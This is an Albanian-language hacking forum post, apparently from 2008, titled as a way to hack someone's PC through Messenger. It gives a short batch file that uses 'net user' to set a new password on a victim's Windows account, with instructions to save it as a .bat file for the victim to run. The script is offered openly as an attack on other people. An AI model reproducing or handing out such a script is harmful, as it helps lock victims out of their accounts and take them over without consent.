ForumPortalCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 hacko pc e dikujna permes messengerit

Shko poshtë 
AutoriMesazh
ACIDI
Admin
Admin
avatar

Numri i postimeve : 221
Age : 25
Nga Jeni : Deqan
Registration date : 19/12/2008

MesazhTitulli: hacko pc e dikujna permes messengerit   Sun Dec 21, 2008 3:03 am

kjo osht ajo qe duhet te beni::
krijoni nje text document te ri dhe ne te shkruani

[url]1:@echo off
2:net user "psh emri i viktimes" dhe passin e ri qe doni ju *123456*
3:echo "Say Good Bay To The Bad Gay "
4:Pause[/url]

mos harroni te futni passin e ri ne ato yjet ( shift 8 )
ruajeni si diqka qe ju doni por me pikë bat( .bat ) psh.. Say Good Bay To The Bad Gay.bat
ruajeni tek ALL FILES sepse ndryshe nuk funksionon
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.sgh-team.tk
 
hacko pc e dikujna permes messengerit
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: ¸.·´¯) Paneli i Kontrollit (¯`·., :: Hacking-
Kërce tek: